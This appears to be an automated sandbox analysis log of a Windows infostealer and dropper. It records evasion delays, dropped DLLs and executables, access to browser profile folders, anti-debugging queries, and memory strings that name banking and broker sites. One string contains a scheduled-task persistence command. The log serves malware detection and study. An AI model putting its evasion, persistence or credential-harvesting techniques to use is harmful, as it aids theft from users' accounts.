Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory allocated: 26F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Memory allocated: 1400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Memory allocated: 4D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory allocated: 2D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory allocated: 4D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Memory allocated: 1750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Memory allocated: 5100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory allocated: 930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory allocated: 2260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory allocated: 4260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory allocated: D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory allocated: 47B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory allocated: 1500000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory allocated: 3150000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory allocated: 5150000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1230000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 16E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3130000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 5130000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 1530000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 3290000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 16A0000 memory reserve \| memory write watch

Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep,

2_2_00433130

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 499

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\sdhsfd[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Dropped PE file which has not been started: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeM3rFKsjF1QTDth5a (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-Q0C3D.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Dropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Dropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-LNCCE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-P2EA6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\Documents\iofolko5\5hZhKNjlLZuuPtI0L125s4tL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-JC1FU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BDTFI.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BKLVU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-KPLGI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\AKEGHIJJEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF9UL.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Jump to dropped file

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_8-5969

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 7440	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7632	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7632	Thread sleep time: -99800s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7508	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7636	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe TID: 7892	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe TID: 2420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe TID: 1648	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe TID: 7944	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe TID: 4764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe TID: 1284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe TID: 1256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe TID: 7284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2376	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe TID: 1760	Thread sleep time: -58000s >= -30000s
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe TID: 3596	Thread sleep time: -1260000s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 4984	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00540905

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

Code function: 8_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

8_2_00409B78

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\.ms-ad\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior

Source: v7u3knm8W6_1U6jDWPH31qsx.exe	Binary or memory string: VMware
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815455961.000000000132F000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1813527885.0000000001317000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CYCFPXIEBATTBKHGFSELOVMGNCWKTKMDAPMJOG
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: memcpy after 1memcpy after 2memcpy after 3memcpy after 4memcpy after 5before zip stream oopenFailed to open zip streamzip entry open Failed to open zip entryFailed to read zip entryFailed to allocate memory%s/%sError opening fileError writing to fileopen /create /tn "ServiceData4" /tr "%s" /st 00:01 /du 9800:59 /sc once /ri 1 /fschtasks.exeCapCutVisual Studio Setup\ProfilesRoaming\Profiles\imloifkgjagghnncjkhggdhalmcnfklkContent-Type: multipart/form-data; boundary=----Boundary%luDriverPack Notifier.configPotPlayerMini64GRETECHwebview2BeamNG.driveSoftware Reporter ToolVMwareFree_PDF_SolutionsPanasonicProtectUserBenchmarkStreamingVideoProviderdiscordJackbox Gamescwd_globalDocker Desktop.dockerDocker1
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815455961.000000000132F000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1813527885.0000000001317000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWyP
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: RegAsm.exe, 0000001D.00000002.2552634631.000000000365D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155

Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe

API call chain: ExitProcess graph end node

graph_8-6766

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process queried: DebugPort	Jump to behavior
